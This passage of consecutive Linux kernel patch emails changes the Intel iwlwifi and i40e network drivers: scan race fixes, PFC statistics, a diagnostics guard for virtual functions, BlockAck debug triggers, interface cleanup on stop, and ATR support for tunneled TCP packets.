IWL_MVM_REF_SCAN); - } else if (iwl_mvm_scan_uid_by_status(mvm, IWL_MVM_SCAN_SCHED) < 0) { - ieee80211_sched_scan_stopped(mvm->hw); - } else { - IWL_DEBUG_SCAN(mvm, "Another sched scan is running\n"); - } - return 0; } @@ -1430,7 +1428,7 @@ static int iwl_mvm_umac_scan_abort(struct iwl_mvm *mvm, int type) ret = iwl_mvm_send_cmd_pdu(mvm, SCAN_ABORT_UMAC, 0, sizeof(cmd), &cmd); if (!ret) - mvm->scan_uid_status[uid] = 0; + mvm->scan_uid_status[uid] = type << IWL_MVM_SCAN_STOPPING_SHIFT; return ret; } From 262888fcc70d42343dfb137a021d45be05183da6 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Thu, 7 May 2015 17:21:09 +0300 Subject: [PATCH 393/872] iwlwifi: mvm: treat scan races also on UMAC scans For UMAC, we were not treating a race condition that happens in the scan flows, because it was not using the same state flags. Now that UMAC and LMAC scans use the same state flags, we can also handle the race conditions for UMAC. Signed-off-by: Luciano Coelho Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 12 ++---------- 1 file changed, 2 insertions(+), 10 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index d3af88bcff80..cea2366fc72e 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -2413,11 +2413,7 @@ static void iwl_mvm_mac_cancel_hw_scan(struct ieee80211_hw *hw, * cancel scan scan before ieee80211_scan_work() could run. * To handle that, simply return if the scan is not running. 
*/ - /* FIXME: for now, we ignore this race for UMAC scans, since - * they don't set the scan_status. - */ - if ((mvm->scan_status & IWL_MVM_SCAN_REGULAR) || - (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN)) + if (mvm->scan_status & IWL_MVM_SCAN_REGULAR) iwl_mvm_scan_stop(mvm, IWL_MVM_SCAN_REGULAR, true); mutex_unlock(&mvm->mutex); @@ -2767,11 +2763,7 @@ static int iwl_mvm_mac_sched_scan_stop(struct ieee80211_hw *hw, * could run. To handle this, simply return if the scan is * not running. */ - /* FIXME: for now, we ignore this race for UMAC scans, since - * they don't set the scan_status. - */ - if (!(mvm->scan_status & IWL_MVM_SCAN_SCHED) && - !(mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN)) { + if (!(mvm->scan_status & IWL_MVM_SCAN_SCHED)) { mutex_unlock(&mvm->mutex); return 0; } From e120814d74bc805769d18ed7177f43a17a88fd40 Mon Sep 17 00:00:00 2001 From: Neerav Parikh Date: Thu, 16 Apr 2015 20:05:58 -0400 Subject: [PATCH 394/872] i40e: Collect PFC XOFF RX stats even in single TC case When PFC is enabled for any UP in single TC configuration the driver didn't collect the PFC XOFF RX stats. Though a single TC with PFC enabled is not a common scenario do not prevent the driver from collecting stats if firmware indicates that PFC is enabled. Change-ID: Ie20bd58b07608b528f3c6d95894c9ae56b00077a Signed-off-by: Neerav Parikh Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_main.c | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c index a54c14491e3b..f1a8c4c1e389 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_main.c +++ b/drivers/net/ethernet/intel/i40e/i40e_main.c @@ -772,9 +772,8 @@ static void i40e_update_prio_xoff_rx(struct i40e_pf *pf) dcb_cfg = &hw->local_dcbx_config; - /* See if DCB enabled with PFC TC */ - if (!(pf->flags & I40E_FLAG_DCB_ENABLED) || - !(dcb_cfg->pfc.pfcenable)) { + /* Collect Link XOFF stats when PFC is disabled */ + if (!dcb_cfg->pfc.pfcenable) { i40e_update_link_xoff_rx(pf); return; } From e17bc411aea8fbebc51857037f104ab09f765120 Mon Sep 17 00:00:00 2001 From: Greg Rose Date: Thu, 16 Apr 2015 20:05:59 -0400 Subject: [PATCH 395/872] i40e: Disable offline diagnostics if VFs are enabled Require the user to disable virtual functions before running the device offline diagnostics. The offline diagnostics are intended to ensure basic operation of the device - it is beyond the scope of the diagnostic test to handle the additional complexity of bringing all the virtual functions offline and then back online for each test run. 
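The guard added here is essentially a mutual exclusion between offline diagnostics and active VFs; a minimal, self-contained C sketch of that idea (placeholder names and return values, not the i40e code):

#include <stdbool.h>
#include <stdio.h>

static bool vfs_active;	/* any VF currently in the ACTIVE state */
static bool testing;	/* offline diagnostics in progress */

static int start_offline_diag(void)
{
	if (vfs_active) {
		printf("take VFs offline before running diagnostics\n");
		return -1;	/* every sub-test is reported as failed */
	}
	testing = true;
	/* ... register/eeprom/interrupt/loopback/link tests run here ... */
	testing = false;
	return 0;
}

static int enable_sriov(int num_vfs)
{
	if (testing) {
		printf("cannot enable VFs during diagnostic testing\n");
		return -1;	/* the driver side refuses with -EPERM */
	}
	vfs_active = num_vfs > 0;
	return 0;
}

int main(void)
{
	enable_sriov(4);
	start_offline_diag();	/* refused: VFs are active */
	enable_sriov(0);
	start_offline_diag();	/* runs */
	return 0;
}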
Change-ID: Ic0b854851a09fc85df0c9e82c220e45885457c30 Signed-off-by: Greg Rose Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- .../net/ethernet/intel/i40e/i40e_ethtool.c | 27 +++++++++++++++++++ .../ethernet/intel/i40e/i40e_virtchnl_pf.c | 7 +++++ 2 files changed, 34 insertions(+) diff --git a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c index 4cbaaeb902c4..e77b6bddd90e 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c +++ b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c @@ -1548,6 +1548,17 @@ static int i40e_loopback_test(struct net_device *netdev, u64 *data) return *data; } +static inline bool i40e_active_vfs(struct i40e_pf *pf) +{ + struct i40e_vf *vfs = pf->vf; + int i; + + for (i = 0; i < pf->num_alloc_vfs; i++) + if (vfs[i].vf_states & I40E_VF_STAT_ACTIVE) + return true; + return false; +} + static void i40e_diag_test(struct net_device *netdev, struct ethtool_test *eth_test, u64 *data) { @@ -1560,6 +1571,20 @@ static void i40e_diag_test(struct net_device *netdev, netif_info(pf, drv, netdev, "offline testing starting\n"); set_bit(__I40E_TESTING, &pf->state); + + if (i40e_active_vfs(pf)) { + dev_warn(&pf->pdev->dev, + "Please take active VFS offline and restart the adapter before running NIC diagnostics\n"); + data[I40E_ETH_TEST_REG] = 1; + data[I40E_ETH_TEST_EEPROM] = 1; + data[I40E_ETH_TEST_INTR] = 1; + data[I40E_ETH_TEST_LOOPBACK] = 1; + data[I40E_ETH_TEST_LINK] = 1; + eth_test->flags |= ETH_TEST_FL_FAILED; + clear_bit(__I40E_TESTING, &pf->state); + goto skip_ol_tests; + } + /* If the device is online then take it offline */ if (if_running) /* indicate we're in test mode */ @@ -1605,6 +1630,8 @@ static void i40e_diag_test(struct net_device *netdev, data[I40E_ETH_TEST_LOOPBACK] = 0; } +skip_ol_tests: + netif_info(pf, drv, netdev, "testing finished\n"); } diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c index 78d1c4ff565e..4653b6e653c9 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c +++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c @@ -980,6 +980,13 @@ static int i40e_pci_sriov_enable(struct pci_dev *pdev, int num_vfs) int pre_existing_vfs = pci_num_vf(pdev); int err = 0; + if (pf->state & __I40E_TESTING) { + dev_warn(&pdev->dev, + "Cannot enable SR-IOV virtual functions while the device is undergoing diagnostic testing\n"); + err = -EPERM; + goto err_out; + } + dev_info(&pdev->dev, "Allocating %d VFs.\n", num_vfs); if (pre_existing_vfs && pre_existing_vfs != num_vfs) i40e_free_vfs(pf); From 4203263d8302be20c5fa8a2ceb1ca3527808ad4e Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Wed, 15 Apr 2015 12:43:46 +0300 Subject: [PATCH 396/872] iwlwifi: mvm: implement the BlockAck related debug triggers BlockAck sessions can have events that are interesting to debug. When we send or receive a BAR, it is may indicate that something bad is happening. Even more so when mac80211 tells us that a frame timed out in the reodering buffer. Add a few triggers for BlockAck session debugging. Allow per-TID debugging. 
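A minimal, self-contained C sketch of the per-TID trigger check this patch introduces (a simplified stand-in, not the actual CHECK_BA_TRIGGER macro): each BlockAck event type carries a 16-bit TID bitmap, and a firmware dump is collected only when the event's TID bit is set:

#include <stdint.h>
#include <stdio.h>

/* Simplified trigger configuration: one TID bitmap per event type. */
struct ba_trigger {
	uint16_t rx_ba_start;
	uint16_t frame_timeout;
};

static void check_trigger(uint16_t tid_bitmap, int tid, const char *what)
{
	if (tid_bitmap & (1u << tid))
		printf("collect firmware debug data: %s, tid %d\n", what, tid);
}

int main(void)
{
	struct ba_trigger trig = {
		.rx_ba_start   = 1u << 5,	/* only TID 5 */
		.frame_timeout = 0xffff,	/* all TIDs */
	};

	check_trigger(trig.rx_ba_start, 5, "RX AGG START");	/* fires */
	check_trigger(trig.rx_ba_start, 3, "RX AGG START");	/* ignored */
	check_trigger(trig.frame_timeout, 3, "frame timeout");	/* fires */
	return 0;
}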
Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-drv.c | 6 +- .../net/wireless/iwlwifi/iwl-fw-error-dump.h | 6 +- drivers/net/wireless/iwlwifi/iwl-fw-file.h | 27 ++++ drivers/net/wireless/iwlwifi/mvm/mac80211.c | 140 +++++++++++++++++- drivers/net/wireless/iwlwifi/mvm/tx.c | 31 +++- 5 files changed, 200 insertions(+), 10 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-drv.c b/drivers/net/wireless/iwlwifi/iwl-drv.c index 7267152e7dc7..12566c8cb275 100644 --- a/drivers/net/wireless/iwlwifi/iwl-drv.c +++ b/drivers/net/wireless/iwlwifi/iwl-drv.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2007 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2005 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -1239,6 +1239,8 @@ static void iwl_req_fw_callback(const struct firmware *ucode_raw, void *context) sizeof(struct iwl_fw_dbg_trigger_txq_timer); trigger_tlv_sz[FW_DBG_TRIGGER_TIME_EVENT] = sizeof(struct iwl_fw_dbg_trigger_time_event); + trigger_tlv_sz[FW_DBG_TRIGGER_BA] = + sizeof(struct iwl_fw_dbg_trigger_ba); for (i = 0; i < ARRAY_SIZE(drv->fw.dbg_trigger_tlv); i++) { if (pieces->dbg_trigger_tlv[i]) { diff --git a/drivers/net/wireless/iwlwifi/iwl-fw-error-dump.h b/drivers/net/wireless/iwlwifi/iwl-fw-error-dump.h index 251bf8dc4a12..e57dbd0ef2e1 100644 --- a/drivers/net/wireless/iwlwifi/iwl-fw-error-dump.h +++ b/drivers/net/wireless/iwlwifi/iwl-fw-error-dump.h @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2014 Intel Mobile Communications GmbH + * Copyright(c) 2014 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2014 Intel Mobile Communications GmbH + * Copyright(c) 2014 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -254,6 +254,7 @@ iwl_fw_error_next_data(struct iwl_fw_error_dump_data *data) * detection. * @FW_DBG_TRIGGER_TIME_EVENT: trigger log collection upon time events related * events. + * @FW_DBG_TRIGGER_BA: trigger log collection upon BlockAck related events. 
*/ enum iwl_fw_dbg_trigger { FW_DBG_TRIGGER_INVALID = 0, @@ -267,6 +268,7 @@ enum iwl_fw_dbg_trigger { FW_DBG_TRIGGER_RSSI, FW_DBG_TRIGGER_TXQ_TIMERS, FW_DBG_TRIGGER_TIME_EVENT, + FW_DBG_TRIGGER_BA, /* must be last */ FW_DBG_TRIGGER_MAX, diff --git a/drivers/net/wireless/iwlwifi/iwl-fw-file.h b/drivers/net/wireless/iwlwifi/iwl-fw-file.h index 839b2c4a1ad8..a8d0b6423f7c 100644 --- a/drivers/net/wireless/iwlwifi/iwl-fw-file.h +++ b/drivers/net/wireless/iwlwifi/iwl-fw-file.h @@ -663,6 +663,33 @@ struct iwl_fw_dbg_trigger_time_event { } __packed time_events[16]; } __packed; +/** + * struct iwl_fw_dbg_trigger_ba - configures BlockAck related trigger + * rx_ba_start: tid bitmap to configure on what tid the trigger should occur + * when an Rx BlockAck session is started. + * rx_ba_stop: tid bitmap to configure on what tid the trigger should occur + * when an Rx BlockAck session is stopped. + * tx_ba_start: tid bitmap to configure on what tid the trigger should occur + * when a Tx BlockAck session is started. + * tx_ba_stop: tid bitmap to configure on what tid the trigger should occur + * when a Tx BlockAck session is stopped. + * rx_bar: tid bitmap to configure on what tid the trigger should occur + * when a BAR is received (for a Tx BlockAck session). + * tx_bar: tid bitmap to configure on what tid the trigger should occur + * when a BAR is send (for an Rx BlocAck session). + * frame_timeout: tid bitmap to configure on what tid the trigger should occur + * when a frame times out in the reodering buffer. + */ +struct iwl_fw_dbg_trigger_ba { + __le16 rx_ba_start; + __le16 rx_ba_stop; + __le16 tx_ba_start; + __le16 tx_ba_stop; + __le16 rx_bar; + __le16 tx_bar; + __le16 frame_timeout; +} __packed; + /** * struct iwl_fw_dbg_conf_tlv - a TLV that describes a debug configuration. * @id: conf id diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index cea2366fc72e..71b66cb6ff12 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -737,6 +737,60 @@ static inline bool iwl_enable_tx_ampdu(const struct iwl_cfg *cfg) return true; } +#define CHECK_BA_TRIGGER(_mvm, _trig, _tid_bm, _tid, _fmt...) 
\ + do { \ + if (!(le16_to_cpu(_tid_bm) & BIT(_tid))) \ + break; \ + iwl_mvm_fw_dbg_collect_trig(_mvm, _trig, _fmt); \ + } while (0) + +static void +iwl_mvm_ampdu_check_trigger(struct iwl_mvm *mvm, struct ieee80211_vif *vif, + struct ieee80211_sta *sta, u16 tid, u16 rx_ba_ssn, + enum ieee80211_ampdu_mlme_action action) +{ + struct iwl_fw_dbg_trigger_tlv *trig; + struct iwl_fw_dbg_trigger_ba *ba_trig; + + if (!iwl_fw_dbg_trigger_enabled(mvm->fw, FW_DBG_TRIGGER_BA)) + return; + + trig = iwl_fw_dbg_get_trigger(mvm->fw, FW_DBG_TRIGGER_BA); + ba_trig = (void *)trig->data; + + if (!iwl_fw_dbg_trigger_check_stop(mvm, vif, trig)) + return; + + switch (action) { + case IEEE80211_AMPDU_TX_OPERATIONAL: { + struct iwl_mvm_sta *mvmsta = iwl_mvm_sta_from_mac80211(sta); + struct iwl_mvm_tid_data *tid_data = &mvmsta->tid_data[tid]; + + CHECK_BA_TRIGGER(mvm, trig, ba_trig->tx_ba_start, tid, + "TX AGG START: MAC %pM tid %d ssn %d\n", + sta->addr, tid, tid_data->ssn); + break; + } + case IEEE80211_AMPDU_TX_STOP_CONT: + CHECK_BA_TRIGGER(mvm, trig, ba_trig->tx_ba_stop, tid, + "TX AGG STOP: MAC %pM tid %d\n", + sta->addr, tid); + break; + case IEEE80211_AMPDU_RX_START: + CHECK_BA_TRIGGER(mvm, trig, ba_trig->rx_ba_start, tid, + "RX AGG START: MAC %pM tid %d ssn %d\n", + sta->addr, tid, rx_ba_ssn); + break; + case IEEE80211_AMPDU_RX_STOP: + CHECK_BA_TRIGGER(mvm, trig, ba_trig->rx_ba_stop, tid, + "RX AGG STOP: MAC %pM tid %d\n", + sta->addr, tid); + break; + default: + break; + } +} + static int iwl_mvm_mac_ampdu_action(struct ieee80211_hw *hw, struct ieee80211_vif *vif, enum ieee80211_ampdu_mlme_action action, @@ -813,6 +867,16 @@ static int iwl_mvm_mac_ampdu_action(struct ieee80211_hw *hw, ret = -EINVAL; break; } + + if (!ret) { + u16 rx_ba_ssn = 0; + + if (action == IEEE80211_AMPDU_RX_START) + rx_ba_ssn = *ssn; + + iwl_mvm_ampdu_check_trigger(mvm, vif, sta, tid, + rx_ba_ssn, action); + } mutex_unlock(&mvm->mutex); /* @@ -3904,9 +3968,9 @@ static void iwl_mvm_mac_sta_statistics(struct ieee80211_hw *hw, mutex_unlock(&mvm->mutex); } -static void iwl_mvm_mac_event_callback(struct ieee80211_hw *hw, - struct ieee80211_vif *vif, - const struct ieee80211_event *event) +static void iwl_mvm_event_mlme_callback(struct iwl_mvm *mvm, + struct ieee80211_vif *vif, + const struct ieee80211_event *event) { #define CHECK_MLME_TRIGGER(_mvm, _trig, _buf, _cnt, _fmt...) 
\ do { \ @@ -3915,7 +3979,6 @@ static void iwl_mvm_mac_event_callback(struct ieee80211_hw *hw, iwl_mvm_fw_dbg_collect_trig(_mvm, _trig, _fmt);\ } while (0) - struct iwl_mvm *mvm = IWL_MAC80211_GET_MVM(hw); struct iwl_fw_dbg_trigger_tlv *trig; struct iwl_fw_dbg_trigger_mlme *trig_mlme; @@ -3959,6 +4022,75 @@ static void iwl_mvm_mac_event_callback(struct ieee80211_hw *hw, #undef CHECK_MLME_TRIGGER } +static void iwl_mvm_event_bar_rx_callback(struct iwl_mvm *mvm, + struct ieee80211_vif *vif, + const struct ieee80211_event *event) +{ + struct iwl_fw_dbg_trigger_tlv *trig; + struct iwl_fw_dbg_trigger_ba *ba_trig; + + if (!iwl_fw_dbg_trigger_enabled(mvm->fw, FW_DBG_TRIGGER_BA)) + return; + + trig = iwl_fw_dbg_get_trigger(mvm->fw, FW_DBG_TRIGGER_BA); + ba_trig = (void *)trig->data; + if (!iwl_fw_dbg_trigger_check_stop(mvm, vif, trig)) + return; + + if (!(le16_to_cpu(ba_trig->rx_bar) & BIT(event->u.ba.tid))) + return; + + iwl_mvm_fw_dbg_collect_trig(mvm, trig, + "BAR received from %pM, tid %d, ssn %d", + event->u.ba.sta->addr, event->u.ba.tid, + event->u.ba.ssn); +} + +static void +iwl_mvm_event_frame_timeout_callback(struct iwl_mvm *mvm, + struct ieee80211_vif *vif, + const struct ieee80211_event *event) +{ + struct iwl_fw_dbg_trigger_tlv *trig; + struct iwl_fw_dbg_trigger_ba *ba_trig; + + if (!iwl_fw_dbg_trigger_enabled(mvm->fw, FW_DBG_TRIGGER_BA)) + return; + + trig = iwl_fw_dbg_get_trigger(mvm->fw, FW_DBG_TRIGGER_BA); + ba_trig = (void *)trig->data; + if (!iwl_fw_dbg_trigger_check_stop(mvm, vif, trig)) + return; + + if (!(le16_to_cpu(ba_trig->frame_timeout) & BIT(event->u.ba.tid))) + return; + + iwl_mvm_fw_dbg_collect_trig(mvm, trig, + "Frame from %pM timed out, tid %d", + event->u.ba.sta->addr, event->u.ba.tid); +} + +static void iwl_mvm_mac_event_callback(struct ieee80211_hw *hw, + struct ieee80211_vif *vif, + const struct ieee80211_event *event) +{ + struct iwl_mvm *mvm = IWL_MAC80211_GET_MVM(hw); + + switch (event->type) { + case MLME_EVENT: + iwl_mvm_event_mlme_callback(mvm, vif, event); + break; + case BAR_RX_EVENT: + iwl_mvm_event_bar_rx_callback(mvm, vif, event); + break; + case BA_FRAME_TIMEOUT: + iwl_mvm_event_frame_timeout_callback(mvm, vif, event); + break; + default: + break; + } +} + const struct ieee80211_ops iwl_mvm_hw_ops = { .tx = iwl_mvm_mac_tx, .ampdu_action = iwl_mvm_mac_ampdu_action, diff --git a/drivers/net/wireless/iwlwifi/mvm/tx.c b/drivers/net/wireless/iwlwifi/mvm/tx.c index ef32e177f662..57e0cbb35f37 100644 --- a/drivers/net/wireless/iwlwifi/mvm/tx.c +++ b/drivers/net/wireless/iwlwifi/mvm/tx.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. 
* * Redistribution and use in source and binary forms, with or without @@ -70,6 +70,30 @@ #include "mvm.h" #include "sta.h" +static void +iwl_mvm_bar_check_trigger(struct iwl_mvm *mvm, const u8 *addr, + u16 tid, u16 ssn) +{ + struct iwl_fw_dbg_trigger_tlv *trig; + struct iwl_fw_dbg_trigger_ba *ba_trig; + + if (!iwl_fw_dbg_trigger_enabled(mvm->fw, FW_DBG_TRIGGER_BA)) + return; + + trig = iwl_fw_dbg_get_trigger(mvm->fw, FW_DBG_TRIGGER_BA); + ba_trig = (void *)trig->data; + + if (!iwl_fw_dbg_trigger_check_stop(mvm, NULL, trig)) + return; + + if (!(le16_to_cpu(ba_trig->tx_bar) & BIT(tid))) + return; + + iwl_mvm_fw_dbg_collect_trig(mvm, trig, + "BAR sent to %pM, tid %d, ssn %d", + addr, tid, ssn); +} + /* * Sets most of the Tx cmd's fields */ @@ -101,12 +125,15 @@ void iwl_mvm_set_tx_cmd(struct iwl_mvm *mvm, struct sk_buff *skb, } else if (ieee80211_is_back_req(fc)) { struct ieee80211_bar *bar = (void *)skb->data; u16 control = le16_to_cpu(bar->control); + u16 ssn = le16_to_cpu(bar->start_seq_num); tx_flags |= TX_CMD_FLG_ACK | TX_CMD_FLG_BAR; tx_cmd->tid_tspec = (control & IEEE80211_BAR_CTRL_TID_INFO_MASK) >> IEEE80211_BAR_CTRL_TID_INFO_SHIFT; WARN_ON_ONCE(tx_cmd->tid_tspec >= IWL_MAX_TID_COUNT); + iwl_mvm_bar_check_trigger(mvm, bar->ra, tx_cmd->tid_tspec, + ssn); } else { tx_cmd->tid_tspec = IWL_TID_NON_QOS; if (info->flags & IEEE80211_TX_CTL_ASSIGN_SEQ) From 8b2b9fbf7e4e1b2e866239d46248431f719ba2c1 Mon Sep 17 00:00:00 2001 From: Arik Nemtsov Date: Wed, 4 Mar 2015 13:16:03 +0200 Subject: [PATCH 397/872] iwlwifi: mvm: clean interfaces on drv_stop If a HW recovery was started but not completed since all interfaces went down, make sure to cleanup all interfaces before clearing the HW_RESTART flag. Signed-off-by: Arik Nemtsov Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index 71b66cb6ff12..9e517e20a14e 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -1489,8 +1489,12 @@ void __iwl_mvm_mac_stop(struct iwl_mvm *mvm) /* * Clear IN_HW_RESTART flag when stopping the hw (as restart_complete() * won't be called in this case). + * But make sure to cleanup interfaces that have gone down before/during + * HW restart was requested. */ - clear_bit(IWL_MVM_STATUS_IN_HW_RESTART, &mvm->status); + if (test_and_clear_bit(IWL_MVM_STATUS_IN_HW_RESTART, &mvm->status)) + ieee80211_iterate_interfaces(mvm->hw, 0, + iwl_mvm_cleanup_iterator, mvm); /* We shouldn't have any UIDs still set. Loop over all the UIDs to * make sure there's nothing left there and warn if any is found. From 89232c3bf78b3799699e48201f60892283564b78 Mon Sep 17 00:00:00 2001 From: Anjali Singhai Jain Date: Thu, 16 Apr 2015 20:06:00 -0400 Subject: [PATCH 398/872] i40e/i40evf: Add ATR support for tunneled TCP/IPv4/IPv6 packets. Without this, RSS would have done inner header load balancing. Now we can get the benefits of ATR for tunneled packets to better align TX and RX queues with the right core/interrupt. 
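A minimal, self-contained C sketch of the header selection this patch adds (simplified pseudo-logic with placeholder names, not the actual i40e_atr() implementation): for VXLAN-encapsulated frames the ATR sample is taken from the inner IP/TCP headers, otherwise from the outer ones, and only TCP flows are sampled:

#include <stdbool.h>
#include <stdio.h>

struct tx_meta {
	bool is_vxlan_tunnel;	/* set by the checksum-offload path */
	bool inner_is_tcp;
	bool outer_is_tcp;
};

static void atr_sample(const struct tx_meta *m)
{
	bool tcp = m->is_vxlan_tunnel ? m->inner_is_tcp : m->outer_is_tcp;

	if (!tcp)
		return;		/* only TCP flows are sampled by ATR */

	printf("program ATR filter from %s IP/TCP headers\n",
	       m->is_vxlan_tunnel ? "inner" : "outer");
}

int main(void)
{
	struct tx_meta plain = { .is_vxlan_tunnel = false, .outer_is_tcp = true };
	struct tx_meta vxlan = { .is_vxlan_tunnel = true,  .inner_is_tcp = true };

	atr_sample(&plain);
	atr_sample(&vxlan);
	return 0;
}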
Change-ID: I07d0e0a192faf28fdd33b2f04c32b2a82ff97ddd Signed-off-by: Anjali Singhai Jain Signed-off-by: Jesse Brandeburg Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_txrx.c | 77 +++++++++++-------- drivers/net/ethernet/intel/i40e/i40e_txrx.h | 1 + drivers/net/ethernet/intel/i40evf/i40e_txrx.c | 34 ++++---- drivers/net/ethernet/intel/i40evf/i40e_txrx.h | 1 + 4 files changed, 62 insertions(+), 51 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c index 0b4a7be2c7d2..8565495b8680 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c @@ -1923,11 +1923,11 @@ int i40e_napi_poll(struct napi_struct *napi, int budget) * i40e_atr - Add a Flow Director ATR filter * @tx_ring: ring to add programming descriptor to * @skb: send buffer - * @flags: send flags + * @tx_flags: send tx flags * @protocol: wire protocol **/ static void i40e_atr(struct i40e_ring *tx_ring, struct sk_buff *skb, - u32 flags, __be16 protocol) + u32 tx_flags, __be16 protocol) { struct i40e_filter_program_desc *fdir_desc; struct i40e_pf *pf = tx_ring->vsi->back; @@ -1952,25 +1952,38 @@ static void i40e_atr(struct i40e_ring *tx_ring, struct sk_buff *skb, if (!tx_ring->atr_sample_rate) return; - /* snag network header to get L4 type and address */ - hdr.network = skb_network_header(skb); + if (!(tx_flags & (I40E_TX_FLAGS_IPV4 | I40E_TX_FLAGS_IPV6))) + return; - /* Currently only IPv4/IPv6 with TCP is supported */ - if (protocol == htons(ETH_P_IP)) { - if (hdr.ipv4->protocol != IPPROTO_TCP) - return; + if (!(tx_flags & I40E_TX_FLAGS_VXLAN_TUNNEL)) { + /* snag network header to get L4 type and address */ + hdr.network = skb_network_header(skb); - /* access ihl as a u8 to avoid unaligned access on ia64 */ - hlen = (hdr.network[0] & 0x0F) << 2; - } else if (protocol == htons(ETH_P_IPV6)) { - if (hdr.ipv6->nexthdr != IPPROTO_TCP) + /* Currently only IPv4/IPv6 with TCP is supported + * access ihl as u8 to avoid unaligned access on ia64 + */ + if (tx_flags & I40E_TX_FLAGS_IPV4) + hlen = (hdr.network[0] & 0x0F) << 2; + else if (protocol == htons(ETH_P_IPV6)) + hlen = sizeof(struct ipv6hdr); + else return; - - hlen = sizeof(struct ipv6hdr); } else { - return; + hdr.network = skb_inner_network_header(skb); + hlen = skb_inner_network_header_len(skb); } + /* Currently only IPv4/IPv6 with TCP is supported + * Note: tx_flags gets modified to reflect inner protocols in + * tx_enable_csum function if encap is enabled. 
+ */ + if ((tx_flags & I40E_TX_FLAGS_IPV4) && + (hdr.ipv4->protocol != IPPROTO_TCP)) + return; + else if ((tx_flags & I40E_TX_FLAGS_IPV6) && + (hdr.ipv6->nexthdr != IPPROTO_TCP)) + return; + th = (struct tcphdr *)(hdr.network + hlen); /* Due to lack of space, no more new filters can be programmed */ @@ -2117,16 +2130,14 @@ static int i40e_tx_prepare_vlan_flags(struct sk_buff *skb, * i40e_tso - set up the tso context descriptor * @tx_ring: ptr to the ring to send * @skb: ptr to the skb we're sending - * @tx_flags: the collected send information - * @protocol: the send protocol * @hdr_len: ptr to the size of the packet header * @cd_tunneling: ptr to context descriptor bits * * Returns 0 if no TSO can happen, 1 if tso is going, or error **/ static int i40e_tso(struct i40e_ring *tx_ring, struct sk_buff *skb, - u32 tx_flags, __be16 protocol, u8 *hdr_len, - u64 *cd_type_cmd_tso_mss, u32 *cd_tunneling) + u8 *hdr_len, u64 *cd_type_cmd_tso_mss, + u32 *cd_tunneling) { u32 cd_cmd, cd_tso_len, cd_mss; struct ipv6hdr *ipv6h; @@ -2218,12 +2229,12 @@ static 